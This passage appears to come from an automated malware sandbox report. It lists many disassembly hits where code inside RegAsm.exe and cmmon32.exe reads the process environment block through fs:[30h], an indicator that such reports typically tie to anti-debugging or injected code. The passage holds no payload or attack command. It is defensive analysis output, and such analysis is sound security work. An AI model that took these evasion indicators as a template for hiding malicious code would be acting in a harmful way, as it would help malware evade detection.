Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h] 9_2_02BE51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE69A6 mov eax, dword ptr fs:[00000030h] 9_2_02BE69A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B961A0 mov eax, dword ptr fs:[00000030h] 9_2_02B961A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92990 mov eax, dword ptr fs:[00000030h] 9_2_02B92990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8C182 mov eax, dword ptr fs:[00000030h] 9_2_02B8C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A185 mov eax, dword ptr fs:[00000030h] 9_2_02B9A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6B1E1 mov eax, dword ptr fs:[00000030h] 9_2_02B6B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BF41E8 mov eax, dword ptr fs:[00000030h] 9_2_02BF41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h] 9_2_02C249A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9513A mov eax, dword ptr fs:[00000030h] 9_2_02B9513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h] 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 mov ecx, dword ptr fs:[00000030h] 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69100 mov eax, dword ptr fs:[00000030h] 9_2_02B69100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6B171 mov eax, dword ptr fs:[00000030h] 9_2_02B6B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6C962 mov eax, dword ptr fs:[00000030h] 9_2_02B6C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8B944 mov eax, dword ptr fs:[00000030h] 9_2_02B8B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1FEC0 mov eax, dword ptr fs:[00000030h] 9_2_02C1FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38ED6 mov eax, dword ptr fs:[00000030h] 9_2_02C38ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE46A7 mov eax, dword ptr fs:[00000030h] 9_2_02BE46A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFFE87 mov eax, dword ptr fs:[00000030h] 9_2_02BFFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B776E2 mov eax, dword ptr fs:[00000030h] 9_2_02B776E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B916E0 mov ecx, dword ptr fs:[00000030h] 9_2_02B916E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C30EA5 mov eax, dword ptr fs:[00000030h] 9_2_02C30EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B936CC mov eax, dword ptr fs:[00000030h] 9_2_02B936CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA8EC7 mov eax, dword ptr fs:[00000030h] 9_2_02BA8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2AE44 mov eax, dword ptr fs:[00000030h] 9_2_02C2AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6E620 mov eax, dword ptr fs:[00000030h] 9_2_02B6E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A61C mov eax, dword ptr fs:[00000030h] 9_2_02B9A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6C600 mov eax, dword ptr fs:[00000030h] 9_2_02B6C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B98E00 mov eax, dword ptr fs:[00000030h] 9_2_02B98E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21608 mov eax, dword ptr fs:[00000030h] 9_2_02C21608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h] 9_2_02B8AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7766D mov eax, dword ptr fs:[00000030h] 9_2_02B7766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h] 9_2_02B77E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1FE3F mov eax, dword ptr fs:[00000030h] 9_2_02C1FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B78794 mov eax, dword ptr fs:[00000030h] 9_2_02B78794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE7794 mov eax, dword ptr fs:[00000030h] 9_2_02BE7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA37F5 mov eax, dword ptr fs:[00000030h] 9_2_02BA37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9E730 mov eax, dword ptr fs:[00000030h] 9_2_02B9E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B64F2E mov eax, dword ptr fs:[00000030h] 9_2_02B64F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38F6A mov eax, dword ptr fs:[00000030h] 9_2_02C38F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8F716 mov eax, dword ptr fs:[00000030h] 9_2_02B8F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFFF10 mov eax, dword ptr fs:[00000030h] 9_2_02BFFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A70E mov eax, dword ptr fs:[00000030h] 9_2_02B9A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3070D mov eax, dword ptr fs:[00000030h] 9_2_02C3070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7FF60 mov eax, dword ptr fs:[00000030h] 9_2_02B7FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7EF40 mov eax, dword ptr fs:[00000030h] 9_2_02B7EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38CD6 mov eax, dword ptr fs:[00000030h] 9_2_02C38CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7849B mov eax, dword ptr fs:[00000030h] 9_2_02B7849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C214FB mov eax, dword ptr fs:[00000030h] 9_2_02C214FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6CF0 mov eax, dword ptr fs:[00000030h] 9_2_02BE6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9BC2C mov eax, dword ptr fs:[00000030h] 9_2_02B9BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h] 9_2_02BE6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3740D mov eax, dword ptr fs:[00000030h] 9_2_02C3740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8746D mov eax, dword ptr fs:[00000030h] 9_2_02B8746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFC450 mov eax, dword ptr fs:[00000030h] 9_2_02BFC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A44B mov eax, dword ptr fs:[00000030h] 9_2_02B9A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B91DB5 mov eax, dword ptr fs:[00000030h] 9_2_02B91DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B935A1 mov eax, dword ptr fs:[00000030h] 9_2_02B935A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h] 9_2_02C2FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9FD9B mov eax, dword ptr fs:[00000030h] 9_2_02B9FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C18DF1 mov eax, dword ptr fs:[00000030h] 9_2_02C18DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h] 9_2_02B92581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h] 9_2_02B62D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7D5E0 mov eax, dword ptr fs:[00000030h] 9_2_02B7D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C305AC mov eax, dword ptr fs:[00000030h] 9_2_02C305AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h] 9_2_02BE6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6DC9 mov ecx, dword ptr fs:[00000030h] 9_2_02BE6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B94D3B mov eax, dword ptr fs:[00000030h] 9_2_02B94D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6AD30 mov eax, dword ptr fs:[00000030h] 9_2_02B6AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BEA537 mov eax, dword ptr fs:[00000030h] 9_2_02BEA537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8C577 mov eax, dword ptr fs:[00000030h] 9_2_02B8C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B87D50 mov eax, dword ptr fs:[00000030h] 9_2_02B87D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38D34 mov eax, dword ptr fs:[00000030h] 9_2_02C38D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA3D43 mov eax, dword ptr fs:[00000030h] 9_2_02BA3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2E539 mov eax, dword ptr fs:[00000030h] 9_2_02C2E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE3540 mov eax, dword ptr fs:[00000030h] 9_2_02BE3540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478746D mov eax, dword ptr fs:[00000030h] 23_2_0478746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FC450 mov eax, dword ptr fs:[00000030h] 23_2_047FC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A44B mov eax, dword ptr fs:[00000030h] 23_2_0479A44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04838CD6 mov eax, dword ptr fs:[00000030h] 23_2_04838CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479BC2C mov eax, dword ptr fs:[00000030h] 23_2_0479BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h] 23_2_047E6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048214FB mov eax, dword ptr fs:[00000030h] 23_2_048214FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6CF0 mov eax, dword ptr fs:[00000030h] 23_2_047E6CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483740D mov eax, dword ptr fs:[00000030h] 23_2_0483740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477849B mov eax, dword ptr fs:[00000030h] 23_2_0477849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478C577 mov eax, dword ptr fs:[00000030h] 23_2_0478C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04787D50 mov eax, dword ptr fs:[00000030h] 23_2_04787D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048305AC mov eax, dword ptr fs:[00000030h] 23_2_048305AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A3D43 mov eax, dword ptr fs:[00000030h] 23_2_047A3D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E3540 mov eax, dword ptr fs:[00000030h] 23_2_047E3540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04794D3B mov eax, dword ptr fs:[00000030h] 23_2_04794D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04773D34 mov eax, dword ptr fs:[00000030h] 23_2_04773D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476AD30 mov eax, dword ptr fs:[00000030h] 23_2_0476AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047EA537 mov eax, dword ptr fs:[00000030h] 23_2_047EA537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482FDE2 mov eax, dword ptr fs:[00000030h] 23_2_0482FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04818DF1 mov eax, dword ptr fs:[00000030h] 23_2_04818DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477D5E0 mov eax, dword ptr fs:[00000030h] 23_2_0477D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04838D34 mov eax, dword ptr fs:[00000030h] 23_2_04838D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6DC9 mov eax, dword ptr fs:[00000030h] 23_2_047E6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6DC9 mov ecx, dword ptr fs:[00000030h] 23_2_047E6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482E539 mov eax, dword ptr fs:[00000030h] 23_2_0482E539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04813D40 mov eax, dword ptr fs:[00000030h] 23_2_04813D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04791DB5 mov eax, dword ptr fs:[00000030h] 23_2_04791DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047935A1 mov eax, dword ptr fs:[00000030h] 23_2_047935A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479FD9B mov eax, dword ptr fs:[00000030h] 23_2_0479FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04792581 mov eax, dword ptr fs:[00000030h] 23_2_04792581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04762D8A mov eax, dword ptr fs:[00000030h] 23_2_04762D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478AE73 mov eax, dword ptr fs:[00000030h] 23_2_0478AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477766D mov eax, dword ptr fs:[00000030h] 23_2_0477766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04830EA5 mov eax, dword ptr fs:[00000030h] 23_2_04830EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04777E41 mov eax, dword ptr fs:[00000030h] 23_2_04777E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0481FEC0 mov eax, dword ptr fs:[00000030h] 23_2_0481FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04838ED6 mov eax, dword ptr fs:[00000030h] 23_2_04838ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476E620 mov eax, dword ptr fs:[00000030h] 23_2_0476E620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A61C mov eax, dword ptr fs:[00000030h] 23_2_0479A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A61C mov eax, dword ptr fs:[00000030h] 23_2_0479A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h] 23_2_0476C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h] 23_2_0476C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0476C600 mov eax, dword ptr fs:[00000030h] 23_2_0476C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04798E00 mov eax, dword ptr fs:[00000030h] 23_2_04798E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821608 mov eax, dword ptr fs:[00000030h] 23_2_04821608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047776E2 mov eax, dword ptr fs:[00000030h] 23_2_047776E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047916E0 mov ecx, dword ptr fs:[00000030h] 23_2_047916E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047936CC mov eax, dword ptr fs:[00000030h] 23_2_047936CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A8EC7 mov eax, dword ptr fs:[00000030h] 23_2_047A8EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0481FE3F mov eax, dword ptr fs:[00000030h] 23_2_0481FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482AE44 mov eax, dword ptr fs:[00000030h] 23_2_0482AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0482AE44 mov eax, dword ptr fs:[00000030h] 23_2_0482AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E46A7 mov eax, dword ptr fs:[00000030h] 23_2_047E46A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FFE87 mov eax, dword ptr fs:[00000030h] 23_2_047FFE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477FF60 mov eax, dword ptr fs:[00000030h] 23_2_0477FF60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477EF40 mov eax, dword ptr fs:[00000030h] 23_2_0477EF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B73D mov eax, dword ptr fs:[00000030h] 23_2_0478B73D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B73D mov eax, dword ptr fs:[00000030h] 23_2_0478B73D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479E730 mov eax, dword ptr fs:[00000030h] 23_2_0479E730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04764F2E mov eax, dword ptr fs:[00000030h] 23_2_04764F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04764F2E mov eax, dword ptr fs:[00000030h] 23_2_04764F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478F716 mov eax, dword ptr fs:[00000030h] 23_2_0478F716
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FFF10 mov eax, dword ptr fs:[00000030h] 23_2_047FFF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FFF10 mov eax, dword ptr fs:[00000030h] 23_2_047FFF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A70E mov eax, dword ptr fs:[00000030h] 23_2_0479A70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A70E mov eax, dword ptr fs:[00000030h] 23_2_0479A70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483070D mov eax, dword ptr fs:[00000030h] 23_2_0483070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0483070D mov eax, dword ptr fs:[00000030h] 23_2_0483070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A37F5 mov eax, dword ptr fs:[00000030h] 23_2_047A37F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04778794 mov eax, dword ptr fs:[00000030h] 23_2_04778794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04838F6A mov eax, dword ptr fs:[00000030h] 23_2_04838F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h] 23_2_047E7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h] 23_2_047E7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7794 mov eax, dword ptr fs:[00000030h] 23_2_047E7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04780050 mov eax, dword ptr fs:[00000030h] 23_2_04780050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04780050 mov eax, dword ptr fs:[00000030h] 23_2_04780050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h] 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h] 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h] 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478A830 mov eax, dword ptr fs:[00000030h] 23_2_0478A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479002D mov eax, dword ptr fs:[00000030h] 23_2_0479002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h] 23_2_0477B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h] 23_2_0477B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h] 23_2_0477B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0477B02A mov eax, dword ptr fs:[00000030h] 23_2_0477B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h] 23_2_047E7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h] 23_2_047E7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E7016 mov eax, dword ptr fs:[00000030h] 23_2_047E7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04834015 mov eax, dword ptr fs:[00000030h] 23_2_04834015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04834015 mov eax, dword ptr fs:[00000030h] 23_2_04834015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h] 23_2_047640E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h] 23_2_047640E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047640E1 mov eax, dword ptr fs:[00000030h] 23_2_047640E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047658EC mov eax, dword ptr fs:[00000030h] 23_2_047658EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B8E4 mov eax, dword ptr fs:[00000030h] 23_2_0478B8E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478B8E4 mov eax, dword ptr fs:[00000030h] 23_2_0478B8E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov ecx, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FB8D0 mov eax, dword ptr fs:[00000030h] 23_2_047FB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479F0BF mov ecx, dword ptr fs:[00000030h] 23_2_0479F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479F0BF mov eax, dword ptr fs:[00000030h] 23_2_0479F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479F0BF mov eax, dword ptr fs:[00000030h] 23_2_0479F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047A90AF mov eax, dword ptr fs:[00000030h] 23_2_047A90AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047920A0 mov eax, dword ptr fs:[00000030h] 23_2_047920A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04822073 mov eax, dword ptr fs:[00000030h] 23_2_04822073
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04769080 mov eax, dword ptr fs:[00000030h] 23_2_04769080
